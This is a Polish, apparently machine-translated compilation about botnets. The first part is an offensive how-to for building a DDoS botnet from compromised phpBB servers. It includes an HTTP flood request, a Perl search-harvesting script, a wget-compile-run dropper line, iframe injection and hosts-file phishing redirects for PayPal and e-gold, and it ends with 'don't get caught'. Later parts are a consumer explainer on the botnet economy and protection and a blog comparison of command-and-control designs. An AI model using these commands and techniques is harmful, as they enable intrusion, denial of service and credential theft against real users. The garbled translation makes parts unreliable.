DZWONEK

Są tacy, którzy czytają te wiadomości przed tobą.
Subskrybuj, aby otrzymywać świeże artykuły.
E-mail
Imię
Nazwisko
Jak chcesz przeczytać Dzwon
Bez spamu

Czego potrzebujesz, aby zacząć budować swój botnet. Tworzymy nasz botnet bitewny. Zbieranie informacji poufnych

Dzielić
Dzielić
Ćwierkać
Lubić
Lubić

Systemy bezpieczeństwa są ciągle ulepszane, programiści stają się coraz bardziej doświadczeni. Teraz dozwolone jest coraz mniej znanych błędów.

[prolog]
Internet rośnie z ogromną siłą. Hakerowi coraz trudniej jest znaleźć luki w zabezpieczeniach. Administratorzy używają ekspertów ds. Bezpieczeństwa, aby chronić rozwój najfajniejszych ekspertów ds. Bezpieczeństwa. Czy rozpoznajesz swoje myśli? W rzeczywistości Internet jest pełen luk, ale nie ma z nich większego sensu. Cóż, wciąż wygląda jak. Teraz, wyobraź sobie sytuację, masz jakiegoś sieciowego drania, chcesz go ukarać. Dzisiaj porozmawiamy o stworzeniu własnego botnetu bojowego.
Co to jest bot? Dla niewtajemniczonych głupcy przeciwnicy natychmiast wpadają do pamięci w grach komputerowych, które strzelasz w dwie minuty. Tak, to częściowo prawda. W naszym przypadku „bot” to program, który wykonuje wbudowane w niego polecenia. Jak nic specjalnego. Ktoś sprzeciwi się: „Podobno napisałem to w wieku pięciu lat, klikasz przycisk, a program, olya-la, zamyka się”. Zapomnij o dzieciństwie. Wszyscy wiemy, że możliwości kodowania są nieograniczone i można go używać dla dobra i zła. Oczywiście zawsze korzystamy z naszych rozwiązań w dobrych intencjach. „Botnet” to wiele botów zebranych w jednym centrum, które synchronicznie wykonują polecenia właściciela. Nawiasem mówiąc, roboty skierowane są głównie na komputery z systemem Windows. Tutaj możesz ukraść hasła, umieścić Soxa i sformatować śrubę. Odejdę od zasad i powiem ci, jak stworzyć botnet z maszyn nix. Główną funkcją naszego bota jest organizowanie ataków DDOS. Jest to idealny sposób na korzystanie z szerokich kanałów serwerów nix. Rachunkowość. Serwer, który chcesz „zapełnić”, znajduje się na kanale 100 Mb. Oznacza to, że 10-20 botów stojących na tym samym kanale natychmiast zapełni serwer. Jeśli możesz ukryć się za zaporą ogniową przed jednym serwerem, to, niestety, przed większą liczbą botów nie ma zbawienia

[Pisanie bota]
Listę przykładowego bota znajdziesz pod linkiem na końcu artykułu. Dowiedzmy się trochę o kodzie. (Uh, znowu Dream wszystko jest kontrolowane przez IRC? Przez chłodnicę WEB!). Nawiasem mówiąc, sterowanie za pośrednictwem IRC zostało wybrane poprzez jego interaktywność. Powiedzmy, że chcę ukraść kilka serwerów w botnecie z lokalnymi exploitami nuklearnymi. Po prostu wykonuję polecenie SH uname -a za pomocą narzędzi bota i natychmiast znajduję komputer, którego potrzebuję. Następnie, po wykonaniu polecenia w kliencie IRC, załaduję backdoora i otrzymam interaktywną powłokę do dalszych działań. Możliwości są nieskończone. Mówisz - możesz wprowadzić taką kontrolę za pośrednictwem sieci, ale po co przeładowywać stronę i marnować ruch? O wiele wygodniej jest oglądać wszystko w czasie rzeczywistym (chociaż w botnecie jest ponad 1000 botów, możesz zadbać o wygodę interfejsu - na przykład zdrowy rozsądek). Wiele osób uważa, że \u200b\u200borganizacja DDOS jest bardzo skomplikowana. Oto przykładowy zwykły kod ataku:

POBIERZ /server.org HTTP / 1.0 \\ r \\ n Połączenie: Keep-Alive \\ r \\ n Agent użytkownika: Mozilla / 4.75 (X11; U; Windows 5.2 i686) \\ r \\ nHost: server.org:80\\r\\nAkceptuj: image / gif, image / x-xbitmap, image / jpeg, image / pjpeg, image / png, * / * \\ r \\ nAccept-Encoding: gzip \\ r \\ nAccept-Language: en \\ r \\ nAccept-Charset: iso- 8859-1, *, utf-8 \\ r \\ n \\ r \\ n

Oznacza to, że po prostu wysyłamy żądanie do serwera, zmuszając go do odpowiedzi. Wysyłamy go, dopóki serwer nie położy się z powodu braku ruchu lub czasu procesora. Ale czy jesteś ograniczony do jednego bota nix, musisz utworzyć botnet systemu Windows, na przykład w oparciu o AgoBot. Aby to zrobić, możesz utworzyć kod dla bota, który będzie skanował w poszukiwaniu luk w zabezpieczeniach lsasl / dcom na komputerze łączącym się z serwerem, na którym bot jest zainstalowany.

[Utwórz botnet]
W rzeczywistości utworzenie botnetu jest bardzo łatwe. Aby to zrobić, musimy znaleźć lukę w dowolnym skrypcie sieciowym. Znaleziona luka powinna umożliwić interpreterowi powłoki wykonanie poleceń. Gdy znajdziesz lukę, zwróć uwagę na nazwę pliku bage, jego tytuł, nazwę podatnego systemu. Teraz przy pomocy tych danych musisz wykonać dobre zapytanie wyszukiwania. Na przykład wziąłem dobrze znaną lukę w phpBB<=2.0.10. Название файла - viewtopic.php, переменная указывающаю на значения топика форума - t. Значит поисковый запрос будет вида "Powered by phpBB AND viewtopic.php?t=". Чем разумнее и проще запрос ты составишь, тем больше уязвимых серверов попадутся тебе на удочку. В каждого поискового сервера язык запросов немного отличается, так что почитай его описание, перед тем как составлять запрос. Теперь нужно все это автоматизировать. Отправка запроса поисковику будем осуществлять примерно так на Perl:

$ sock \u003d IO :: Socket :: INET-\u003e new (PeerAddr \u003d\u003e „search.aol.com”, PeerPort \u003d\u003e „80”, P ro to \u003d\u003e „tcp”) lub następny; wydrukuj $ sock "GET /aolcom/search?q\u003dviewtopic.php%3Ft%3D7&Stage\u003d0&page\u003d$n HTTP / 1.0 \\ n \\ n"; @resu \u003d<$sock>; zamknij ($ sock);

Wget http://server.org/bot.c;gcc bot.c -o bash; chmod + x bash; ./ bash;

Tutaj możesz zobaczyć dwa problemy na raz. wget i gcc mogą się nie pojawiać lub ich użycie będzie zabronione. Tutaj fech, curl i get rocking pomogą nam lub przeglądarce konsoli Lynx, albo skorzystają z protokołu ftp. Jego implementacja jest bardziej skomplikowana, ale plusem jest to, że ftp jest wszędzie. Jeśli chodzi o kompilator, możesz po prostu skompilować plik binarny na swojej powłoce i mieć nadzieję, że wszystko będzie w porządku z kompatybilnością lub przepisać bota na interpretowane języki - Perl lub PHP. Każda metoda ma swoje zalety i wady, z których należy skorzystać, według własnego wyboru. Jestem przyzwyczajony do maksymalnego wykorzystania przejętego serwera. W końcu bot na serwerze nix będzie działał tylko do pierwszego ponownego uruchomienia komputera. Jest jedna ciekawa droga wyjścia z tej sytuacji. Bot wyszuka zinterpretowane pliki (.pl, .php), które można zapisać, i doda kod, aby pobrać i uruchomić w nich bota. Lub możesz utworzyć kolejny botnet systemu Windows. Jest również łatwy do wdrożenia. Tutaj potrzebujemy podatności w przeglądarce internetowej (Internet Explorer, Opera, Mozilla), która prowadzi do pobrania i uruchomienia pożądanego pliku. Następnie tworzony jest rekord w ramce ładujący nasz złośliwy kod. Ten wpis jest dodawany do wszystkich plików indeksu (lub do wszystkich plików HTML, wszystko zależy od twojej arogancji). Mały skrypt Haz, który znajdziesz również w archiwach, świetnie sobie radzi z taką pracą. Bugtrack jest pełen wpisów o krytycznych lukach w Internet Explorerze, więc w naszym zgłoszeniu pojawi się botnet w systemach Windows (wspomniałem o jego zaletach powyżej). To wszystko, uruchom naszego robaka wyszukującego na szybkiej skorupce, wypij kawę (piwo, wódkę, sok pomidorowy), przejdź do kanału IRC określonego we właściwościach bota i obserwuj liczbę podwładnych. Podsumowując, chcę przywitać się z każdym, kto mnie zna i życzę powodzenia. Nie daj się złapać.
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Luka w phpBB jest istotna do wersji 2.0.16, chociaż programiści twierdzą, że naprawili ją w wersji 2.0.11

Http://_exploits.ath.cx/exploits/data/bots/ http://_www.honeynet.org

Wyłudzanie informacji
Używanie botów jako organizacji phishingowej jest bardzo wygodne. Aby to zrobić, potrzebujemy naostrzenia specjalnych stron poprzez phishing emulujący potrzebną witrynę i dobry hosting, dedykowany serwer lub VDS. Możesz samodzielnie tworzyć takie strony, kupować, znajdować w sieci. Wybór jest ogromny. Najczęściej phishing jest organizowany na stronach: e-gold.com, paypal.com, citybank.com, usbank.com, ebay.c om i innych, w taki czy inny sposób, związanych z handlem elektronicznym. Następnie bot systemu Windows przepisuje plik \\ system32 \\ drivers \\ etc \\ hosts, dodając do niego adres IP serwera i przypisując mu alias potrzebnej witryny. Format pliku jest następujący:

102.54.94.97 e-gold.com 102.54.94.97 paypal.com

Oznacza to, że wpisując w przeglądarce strony e-gold.com i paypal.com, użytkownik wchodzi na nasz serwer, niczego nie podejrzewając. Z kolei wpisy w odpowiednich domenach są dodawane do serwera phishingowego w httpd.conf.

DocumentRoot ”/home/e-gold.com/www„ ServerName ”www.e-gold.com„ ServerAlias \u200b\u200b”e-gold.com” „www.e-gold.com”

Oczywiście w linii przeglądarki będzie znany adres e-gold.com, a nawet zaawansowany użytkownik zaloguje się na stronie, niczego nie podejrzewając. Dla kompletności powiem, że jeśli użytkownik korzysta z serwera proxy, ta metoda nie będzie działać

Boty na każdy gust
Agobot / Phatbot / Forbot / XtremBot
To najlepsza rodzina botów. Napisane w C ++. Mają wiele funkcji ochrony przed wykryciem i liczą ponad 500 modyfikacji dzięki wyraźnej strukturze modułowej.
SDBot / RBot / UrBot / UrXBot
Boty bardzo popularne w tej chwili do przeprowadzania ataków DDOS. Mają wiele dodatkowych funkcji. Takich jak otwarcie Sock4, keylogger, automatyczny skaner lsass i luki w zabezpieczeniach dcom. Ma również funkcję przekierowywania żądań do witryn firm antywirusowych na lokalny serwer, edytując \\ system32 \\ drivers \\ etc \\ hosts i instalując mały fałszywy serwer WWW na porcie 80.
Boty DSNX
Ten bot może przeprowadzać ataki DDOS, skanowanie portów i inne drobiazgi.
Boty Q8
Świetny bot dla systemów nix. Różni się kompaktowym kodem (27 Kb, składa się z jednego pliku) i dobrą funkcjonalnością. Możliwość dynamicznej aktualizacji poprzez pobranie i uruchomienie nowego pliku. Implementuje główne implementacje DDOS (SYN-flood, UDP-flood). Potrafi wykonywać polecenia systemowe. Dobrze ukrywa się również w systemie.
kaiten
Również dobry bot pod systemami Unix / Linux. W stanie otworzyć zdalną powłokę na przejętym serwerze.
Boty oparte na Perlu
Są to bardzo małe boty napisane w Perlu. Używany do ataków DDOS na systemy uniksowe.

---
Artykuł ma duży nacisk na hakowanie, więc nie jest jasne - zapytaj.

Dziś botnety stały się jednym z głównych narzędzi cyberprzestępców. ComputerBild powie ci, czym są botnety, jak działają i jak uchronić komputer przed dostępem do sieci zombie.

Botnet lub sieć zombie to sieć komputerów zainfekowanych złośliwym programem, która umożliwia atakującym zdalne sterowanie maszynami innych osób bez wiedzy ich właścicieli. W ostatnich latach sieci zombie stały się stałym źródłem dochodów cyberprzestępców. Niezmiennie niskie koszty i minimalna wiedza niezbędna do zarządzania botnetami przyczyniają się do wzrostu popularności, a tym samym liczby botnetów. Na atakach DDoS lub spamach przeprowadzanych przy użyciu sieci zombie atakujący i ich klienci zarabiają tysiące dolarów.

Czy mój komputer jest zainfekowany botem?

Odpowiedź na to pytanie nie jest łatwa. Faktem jest, że śledzenie interwencji botów w codziennej pracy komputera jest prawie niemożliwe, ponieważ nie wpływa to na szybkość systemu. Niemniej jednak istnieje kilka znaków, za pomocą których można ustalić, że bot jest obecny w systemie:

Nieznane programy próbują połączyć się z Internetem, które jest okresowo oburzone przez zaporę ogniową lub oprogramowanie antywirusowe;

Ruch internetowy staje się bardzo duży, chociaż bardzo umiarkowanie korzystasz z sieci;

Na liście uruchomionych procesów systemowych pojawiają się nowe, które ukrywają się jako normalne procesy systemu Windows (na przykład bot może mieć nazwę scvhost.exe - ta nazwa jest bardzo podobna do nazwy procesu systemu svchost.exe; dość trudno jest zauważyć różnicę, ale można to zauważyć).

Dlaczego tworzone są botnety

Botnety są tworzone w celu zarabiania pieniędzy. Istnieje kilka obszarów komercyjnie opłacalnego wykorzystania sieci zombie: ataki DDoS, zbieranie poufnych informacji, spamowanie, phishing, spam w wyszukiwarce, liczniki kliknięć oszukiwających itp. Należy zauważyć, że każdy kierunek będzie opłacalny, bez względu na to, co wybierze atakujący, Botnet pozwala na wykonanie wszystkich tych czynności jednocześnie.

Atak DDoS (z angielskiego Distributed Denial-of-Service) to atak na system komputerowy, taki jak strona internetowa, którego celem jest doprowadzenie systemu do „upadku”, czyli stanu, w którym nie może już odbierać i przetwarzać żądań legalni użytkownicy. Jedną z najczęstszych metod przeprowadzania ataku DDoS jest wysyłanie wielu żądań do komputera lub witryny ofiary, co prowadzi do odmowy usługi, jeśli zasoby atakowanego komputera są niewystarczające do przetworzenia wszystkich przychodzących żądań. Ataki DDoS są potężną bronią dla hakerów, a botnet jest idealnym narzędziem do ich przeprowadzania.

Ataki DDoS mogą być zarówno środkiem nieuczciwej konkurencji, jak i aktami cyberterroryzmu. Właściciel botnetu może świadczyć usługi każdemu niezbyt skrupulatnemu przedsiębiorcy - w celu przeprowadzenia ataku DDoS na stronę swojego konkurenta. Zaatakowany zasób „położy się” po takim obciążeniu, atakujący klient otrzyma tymczasową przewagę, a cyberprzestępca otrzyma skromną (lub nie taką) nagrodę.

W ten sam sposób właściciele botnetów mogą wykorzystywać ataki DDoS w celu wyłudzania pieniędzy od dużych firm. Jednocześnie firmy wolą spełniać wymagania cyberprzestępców, ponieważ likwidacja konsekwencji udanych ataków DDoS jest bardzo kosztowna. Na przykład w styczniu 2009 r. Jeden z największych hostów GoDaddy.com przeszedł atak DDoS, w wyniku którego tysiące witryn hostowanych na jego serwerach było niedostępnych przez prawie jeden dzień. Straty finansowe gospodarza były ogromne.

W lutym 2007 r. Przeprowadzono serię ataków na główne serwery DNS, od których bezpośrednio zależy normalne funkcjonowanie całego Internetu. Jest mało prawdopodobne, aby celem tych ataków było załamanie się sieci WWW, ponieważ istnienie sieci zombie jest możliwe tylko wtedy, gdy Internet istnieje i działa normalnie. Przede wszystkim było to jak pokaz siły i możliwości sieci zombie.

Usługi reklamowe związane z realizacją ataków DDoS są jawnie publikowane na wielu forach odpowiednich tematów. Ceny ataków wahają się od 50 do kilku tysięcy dolarów dziennie za ciągłą pracę botnetu DDoS. Według strony internetowej www.shadowserver.org w 2008 roku przeprowadzono około 190 tysięcy ataków DDoS, na które cyberprzestępcy byli w stanie zarobić około 20 milionów dolarów. Oczywiście wpływy z szantażu, których po prostu nie da się obliczyć, nie są uwzględnione w tej kwocie.

Zbieranie informacji poufnych

Informacje poufne przechowywane na komputerach użytkowników zawsze przyciągają intruzów. Najbardziej interesujące są numery kart kredytowych, informacje finansowe i hasła do różnych usług: skrzynek pocztowych, serwerów FTP, komunikatorów itp. Ponadto nowoczesne złośliwe programy pozwalają atakującym wybrać dokładnie dane, które ich interesują - wystarczy przesłać je na Odpowiedni moduł na PC.

Atakujący mogą albo sprzedać skradzione informacje, albo wykorzystać je na swoją korzyść. Na licznych forach w Internecie codziennie są setki reklam sprzedaży rachunków bankowych. Koszt konta zależy od kwoty pieniędzy na koncie użytkownika i wynosi od 1 do 1500 dolarów na konto. Dolna granica wskazuje, że podczas konkurencji cyberprzestępcy zaangażowani w tego rodzaju biznes są zmuszeni obniżyć ceny. Aby naprawdę dużo zarobić, potrzebują stałego napływu świeżych danych, a do tego potrzebny jest stabilny rozwój sieci zombie. Szczególnie interesujące są informacje finansowe dla osób grających w karty - cyberprzestępców zaangażowanych w fałszowanie kart bankowych.

O tym, jak opłacalne takie operacje można ocenić na podstawie dobrze znanej historii grupy brazylijskich cyberprzestępców, którzy zostali aresztowani dwa lata temu. Byli w stanie wypłacić 4,74 miliona dolarów z rachunków bankowych zwykłych użytkowników przy użyciu informacji skradzionych z komputerów. Przestępcy zaangażowani w fałszowanie dokumentów, otwieranie fałszywych kont bankowych, dokonywanie nielegalnych transakcji itp. Również są zainteresowani pozyskiwaniem danych osobowych niezwiązanych bezpośrednio z pieniędzmi użytkownika.

Innym rodzajem informacji gromadzonych przez botnety są adresy e-mail i, w przeciwieństwie do numerów kart kredytowych i kont, możesz wyodrębnić wiele adresów e-mail z książki adresowej jednego zainfekowanego komputera. Zebrane adresy wystawiane są na sprzedaż, a czasem „wagowo” - na megabajt. Głównymi nabywcami tego „produktu” są spamerzy. Lista milionów adresów e-mail kosztuje od 20 do 100 USD, a lista mailingowa zamówiona dla spamerów na ten sam milion adresów kosztuje 150-200 USD. Korzyści są oczywiste.

Przestępcy są również zainteresowani kontami różnych płatnych usług i sklepów internetowych. Oczywiście są one tańsze niż konta bankowe, ale ich wdrożenie wiąże się z mniejszym ryzykiem nękania przez organy ścigania.

Każdego dnia miliony wiadomości spamowych są rozsyłane po całym świecie. Niezamówione wiadomości to jedna z głównych funkcji współczesnych botnetów. Według Kaspersky Lab około 80% całego spamu jest wysyłane przez sieci zombie. Miliardy e-maili reklamujących Viagrę, kopie drogich zegarków, kasyn online itp., Zatykające kanały komunikacji i skrzynki pocztowe są wysyłane z komputerów użytkowników przestrzegających prawa. W ten sposób hakerzy narażają komputery niewinnych użytkowników: adresy, z których wysyłany jest newsletter, znajdują się na czarnej liście firm antywirusowych.

W ostatnich latach zakres usług spamowych poszerzył się: spam ICQ, spam w sieciach społecznościowych, forach, blogach. Jest to także „zasługa” właścicieli botnetów: nie jest trudno dodać dodatkowy moduł do bota-klienta, który otwiera horyzonty dla nowej firmy z hasłami takimi jak „Spam na Facebooku”. Niedrogi. " Ceny spamu różnią się w zależności od odbiorców docelowych i liczby adresów mailowych. Zakres cen za ukierunkowane przesyłki wynosi od 70 USD za setki tysięcy adresów do 1000 USD za kilkadziesiąt milionów adresów. W ciągu ostatniego roku spamerzy zarobili około 780 milionów dolarów, wysyłając listy.

Utwórz spam wyszukiwania

Inną opcją korzystania z botnetów jest zwiększenie popularności witryn w wyszukiwarkach. Pracując nad optymalizacją wyszukiwarek, administratorzy zasobów starają się zwiększyć pozycję witryny w wynikach wyszukiwania, ponieważ im wyższa, tym więcej osób odwiedza witrynę za pośrednictwem wyszukiwarek, a tym samym większy przychód właściciela witryny, na przykład ze sprzedaży powierzchni reklamowej na stronach internetowych. Wiele firm płaci webmasterom dużo pieniędzy, aby doprowadzić witrynę do pierwszych pozycji w „wyszukiwarkach”. Właściciele botnetów zauważyli niektóre swoje sztuczki i zautomatyzowali proces optymalizacji pod kątem wyszukiwarek.

Gdy zobaczysz wiele linków utworzonych przez nieznaną osobę, a czasem twojego znajomego, w komentarzach do twojego wpisu na LiveJournal lub na udanym zdjęciu opublikowanym na hostingu zdjęć, nie zdziw się: ktoś właśnie zamówił promocję swojego zasobu właścicielom botnet. Specjalnie utworzony program jest pobierany na komputer zombie i, w imieniu jego właściciela, pozostawia komentarze na temat popularnych zasobów wraz z linkami do nieskręconej strony. Średnia cena za nielegalne usługi spamujące w wyszukiwaniu wynosi około 300 USD miesięcznie.

Ile kosztują dane osobowe

Koszt skradzionych danych osobowych zależy bezpośrednio od kraju, w którym mieszka ich prawowity właściciel. Na przykład pełne dane mieszkańca Stanów Zjednoczonych kosztują 5-8 dolarów. Dane dotyczące mieszkańców Unii Europejskiej są szczególnie cenione na czarnym rynku - są dwa do trzech razy droższe niż dane od obywateli Stanów Zjednoczonych i Kanady. Można to wytłumaczyć faktem, że przestępcy mogą wykorzystywać takie dane w dowolnym kraju w UE. Średnia światowa cena pełnego pakietu danych o jednej osobie wynosi około 7 USD.

Niestety dla tych, którzy zdecydują się uruchomić botnet od zera, nie będzie trudno znaleźć instrukcje dotyczące tworzenia sieci zombie w Internecie. Pierwszy krok: utwórz nową sieć zombie. Aby to zrobić, musisz zainfekować komputery użytkowników specjalnym programem - botem. Do infekcji stosuje się wysyłanie spamu, wysyłanie wiadomości na forach i sieciach społecznościowych oraz inne sztuczki; często bot jest wyposażony w funkcję samorozwoju, podobnie jak wirusy lub robaki.

Aby zmusić potencjalną ofiarę do zainstalowania bota, używają technik inżynierii społecznej. Na przykład oferują obejrzenie interesującego filmu, który wymaga pobrania specjalnego kodeka. Po pobraniu i uruchomieniu takiego pliku użytkownik oczywiście nie będzie mógł obejrzeć żadnego filmu i najprawdopodobniej nie zauważy żadnych zmian, a jego komputer zostanie zainfekowany i stanie się pokornym sługą wykonującym wszystkie polecenia hosta botnetu.

Drugą powszechnie stosowaną metodą infekcji botami jest drive-by-boot. Gdy użytkownik odwiedza zainfekowaną stronę internetową na swoim komputerze przez różne „dziury” w aplikacjach - głównie w popularnych przeglądarkach - pobierany jest złośliwy kod. Aby wykorzystać słabe punkty, stosuje się specjalne programy wykorzystujące lukę. Pozwalają one nie tylko cicho pobierać, ale także cicho uruchamiać wirusa lub bota. Ten rodzaj dystrybucji szkodliwego oprogramowania jest najbardziej niebezpieczny, ponieważ jeśli zhakowany zostanie popularny zasób, zainfekowane zostaną dziesiątki tysięcy użytkowników!

Bot może mieć funkcję autodystrybucji w sieciach komputerowych. Na przykład może się rozprzestrzeniać, infekując wszystkie dostępne pliki wykonywalne lub wyszukując i infekując wrażliwe komputery w sieci.

Twórca botnetu może kontrolować zainfekowane komputery niczego niepodejrzewających użytkowników, korzystając z centrum dowodzenia botnetu, komunikując się z botami za pośrednictwem kanału IRC, połączenia internetowego lub za pomocą innych dostępnych środków. Wystarczy zjednoczyć kilkadziesiąt maszyn w sieci, aby botnet zaczął przynosić dochody właścicielowi. Co więcej, dochód ten jest liniowo zależny od stabilności sieci zombie i jej tempa wzrostu.

Firmy reklamowe Pay-per-Click (PPC) płacą pieniądze za unikalne kliknięcia linków do reklam online. Dla właścicieli botnetów oszukanie takich firm jest lukratywnym przedsięwzięciem. Weźmy na przykład dobrze znaną sieć Google AdSense. Zawarci w nim reklamodawcy płacą Google za kliknięcia umieszczonych reklam w nadziei, że użytkownik, który spojrzał „na światło”, coś od nich kupi.

Google z kolei umieszcza reklamy kontekstowe w różnych witrynach uczestniczących w programie AdSense, płacąc właścicielowi witryny procent każdego kliknięcia. Niestety, nie wszyscy właściciele witryn są uczciwi. Dzięki sieci zombie haker może generować tysiące unikalnych kliknięć dziennie - po jednym z każdej maszyny, aby nie wzbudzać podejrzeń ze strony Google. W ten sposób pieniądze wydane na kampanię reklamową wpłyną do kieszeni hakera. Niestety nie było ani jednego przypadku, w którym ktoś byłby pociągany do odpowiedzialności za takie akcje. Według Click Forensics w 2008 r. Około 16-17% wszystkich kliknięć było fałszywych, z czego co najmniej jedna trzecia została wygenerowana przez botnety. Po wykonaniu prostych obliczeń można zrozumieć, że w ubiegłym roku właściciele botnetów „wylali” 33 miliony dolarów. Dobre przychody z kliknięć myszką!

Atakujący i nieuczciwi biznesmeni nie muszą samodzielnie tworzyć botnetu od zera. Mogą kupować lub wypożyczać botnety różnej wielkości i wydajności od hakerów - na przykład kontaktując się ze specjalistycznymi forami.

Koszt gotowego botnetu, a także koszt jego wynajmu, zależy od liczby komputerów w nim zawartych. Gotowe botnety są najpopularniejsze na forach anglojęzycznych.

Małe botnety, składające się z kilkuset botów, kosztują od 200 do 700 dolarów. Jednocześnie średnia cena jednego bota wynosi około 50 centów. Większe botnety kosztują dużo pieniędzy.

Sieć Shadow zombie, która została stworzona kilka lat temu przez 19-letniego hakera z Holandii, liczyła ponad 100 tysięcy komputerów na całym świecie, sprzedanych za 25 000 euro. Za te pieniądze można kupić mały dom w Hiszpanii, ale przestępca z Brazylii zdecydował się na zakup botnetu.

Ochrona przed botnetami

1. Przede wszystkim są to programy antywirusowe i kompleksowe pakiety do ochrony przed zagrożeniami internetowymi dzięki regularnie aktualizowanym bazom danych. Pomogą nie tylko wykryć niebezpieczeństwo na czas, ale także wyeliminować je, zanim Twój wierny „żelazny przyjaciel” zamieniony w zombie zacznie wysyłać spam lub „upuszczać” witryny. Złożone pakiety, takie jak Kaspersky Internet Security 2009, zawierają pełny zestaw funkcji ochronnych, którymi można sterować za pośrednictwem wspólnego centrum dowodzenia.

W tle moduł antywirusowy skanuje najważniejsze obszary systemu i monitoruje wszystkie możliwe ścieżki inwazji wirusów: załączniki wiadomości e-mail i potencjalnie niebezpieczne strony internetowe.

Zapora monitoruje wymianę danych między komputerem osobistym a Internetem. Sprawdza wszystkie pakiety danych otrzymane z sieci lub wysłane tam, aw razie potrzeby blokuje ataki sieciowe i zapobiega tajnemu wysyłaniu danych osobowych do Internetu.

Filtr antyspamowy chroni skrzynkę pocztową przed przenikaniem wiadomości reklamowych. Do jego zadań należy również identyfikowanie wiadomości phishingowych, za pomocą których cyberprzestępcy próbują uzyskać informacje o swoich danych użytkownika w celu wprowadzenia do systemów płatności online lub bankowości.

2. Regularna aktualizacja systemu operacyjnego, przeglądarek internetowych i innych aplikacji, których twórcy wykrywają i eliminują wiele luk w ich ochronie, a także słabości wykorzystywane przez cyberprzestępców.

3. Specjalne programy szyfrujące będą chronić twoje dane osobowe, nawet jeśli bot już wszedł do komputera, ponieważ aby uzyskać do nich dostęp, będzie musiał złamać hasło.

4. Zdrowy rozsądek i ostrożność. Jeśli chcesz chronić swoje dane przed różnego rodzaju zagrożeniami, nie powinieneś pobierać i instalować programów niewiadomego pochodzenia, otwierać archiwów z plikami sprzecznymi z ostrzeżeniami antywirusowymi, przechodzić do witryn oznaczonych przez przeglądarkę jako niebezpieczne itp.

Dziękujemy Kaspersky Lab za pomoc w przygotowaniu materiału

Nic dziwnego, że opublikowałem mój projekt uwagi na temat sieci peer-to-peer . Komentarze czytelników były bardzo pomocne. Zainspirowali mnie do dalszej pracy w tym kierunku. Co z tego wynikło - spójrz pod nacięcie.

Jak pokazuje nazwa postu, dzisiaj będziemy rozmawiać tylko o botnetach. O dzieleniu się plikami, sieciach proxy, blogach peer-to-peer i p2p-currency na chwilę zapominamy.

Słowa „botnet” nie należy rozumieć jako czegoś nielegalnego. Gdy użytkownik dobrowolnie pobiera i instaluje „bota” w celu przekazania swojego ruchu i zasobów obliczeniowych na potrzeby projektu naukowego, jest to również botnet. W związku z tym botmaster niekoniecznie jest przestępcą. Grupa 30 naukowców zaangażowanych w projekt naukowy jest również „botmasterem”.

1. Zarządzanie botnetem za pośrednictwem serwera

Najłatwiejszym sposobem zarządzania botami jest uruchomienie serwera irc / http. Boty będą za jej pośrednictwem otrzymywały polecenia i przy ich pomocy wysyłały wynik ich wykonania.

Rysuję, jak potrafię :) W tym przypadku ilustracja może nie być wymagana, ale postanowiłem przygotować cię na szok, który wywołają pozostałe rysunki.

  • Bardzo prosta implementacja, szczególnie w przypadku IRC.
  • Szybkie boty odpowiedzi.
  • Możesz wydawać polecenia całej sieci, a także określonemu botowi.
  • Jeśli sieć składa się z setek węzłów, wystarczy jeden kanał w DalNet, aby nią zarządzać. W przypadku większych sieci możesz skorzystać z niedrogiego (około 300 rubli / miesiąc) hostingu.
  • W przypadku HTTP-server znacznie upraszcza tworzenie pięknego interfejsu użytkownika. Jest to ważne, jeśli używamy botnetu w jakiejś usłudze internetowej.
  • Obciążenie serwera. Liczba węzłów w największych botnetach mierzona jest w milionach. Aby zarządzać takim tłumem, jeden serwer nie wystarczy.
  • Jeśli coś się stanie z serwerem (awaria sieci, DDoS, pożar w centrum danych), sieć dobiegnie końca.
  • Jeden serwer jest łatwy do zapory ogniowej. Może to zrobić zarówno dostawca, jak i produkty Kaspersky Lab na komputerze użytkownika.
  • Botmaster jest stosunkowo łatwy do znalezienia. Kiedyś zapomniałem o VPN - poczekaj na gości w mundurach.
  • W przypadku IRC, zespoły otrzymują tylko boty online. Jeśli bot wejdzie na kanał w dwie minuty po wysłaniu polecenia, będzie to „nie na temat”.
  • Liczbę botów i ich IP można ustalić, przechodząc do kanału IRC. Zabezpieczenie kanału hasłem nie pomoże, ponieważ ten ostatni można łatwo wybrać z kodu bota.

2. Zarządzanie przez sieć IRC

Logicznym krokiem, aby poradzić sobie z minusami poprzedniej metody, jest utworzenie nie jednego serwera, ale kilku. Moim zdaniem najłatwiej to zrobić, zwiększając sieć IRC. W takim przypadku cała odpowiedzialność za transfer danych między serwerami spoczywa na protokół IRC . Nie będzie różnicy ze strony botów w porównaniu z poprzednim rozwiązaniem.

  • Prosta implementacja, choć będziesz musiał majstrować przy konfigurowaniu serwerów.
  • Boty nadal szybko reagują na polecenia.
  • Nadal możesz wydawać polecenia konkretnemu botowi.
  • Równoważenie obciążenia między serwerami, ochrona przed DDoS i siła wyższa. Tuzin dobrych serwerów może wystarczyć na sieć miliona botów.
  • Jeśli niektóre serwery ulegną awarii, możesz je wymienić.
  • Jeśli używasz IRC i myli tysiąc botów siedzących na jednym kanale, użyj kilku kanałów. W związku z tym możesz nadawać różnym częściom sieci różne zadania.
  • Muszę rozwidlić serwer / VDS.
  • Możesz zwolnić wszystkie serwery jednocześnie, a botmaster nie będzie miał czasu ich wymienić.
  • Botmaster jest nadal wystarczająco łatwy do śledzenia.
  • W przypadku IRC, liczba botów i ich IP są nadal widoczne.
  • Boty, które właśnie odwiedziły kanał, są nie na temat.

Termin trastring (pierścień zaufania, kółko / pierścień zaufania) pierwszy raz usłyszałem od znajomego Nicolasa w komentarze do poprzedniej notatki . Chodzi o umieszczenie funkcji „serwerów” w botnecie.

  • Nie wymaga serwerów.
  • Trastring może składać się z setek węzłów. Podnoszenie i kontrolowanie takiej liczby serwerów irc / http nie jest łatwe.
  • Boty nie muszą stale utrzymywać kontaktu z pchaniem. Wystarczy sprawdzać co 5-10 minut, aby zobaczyć, czy pojawiły się nowe drużyny. Każda drużyna musi posiadać TTL, podczas którego jest przechowywana na trastingu.
  • Duża liczba „serwerów” zapewnia odporność sieci na wszelkiego rodzaju katastrofy. Kiedy część pierścienia umiera, botmaster może wydać polecenie utworzenia nowego trastingu. Lub same węzły pierścieniowe mogą to zrobić (potrzebne są podpisy cyfrowe i zgoda określonego procentu trastingu).
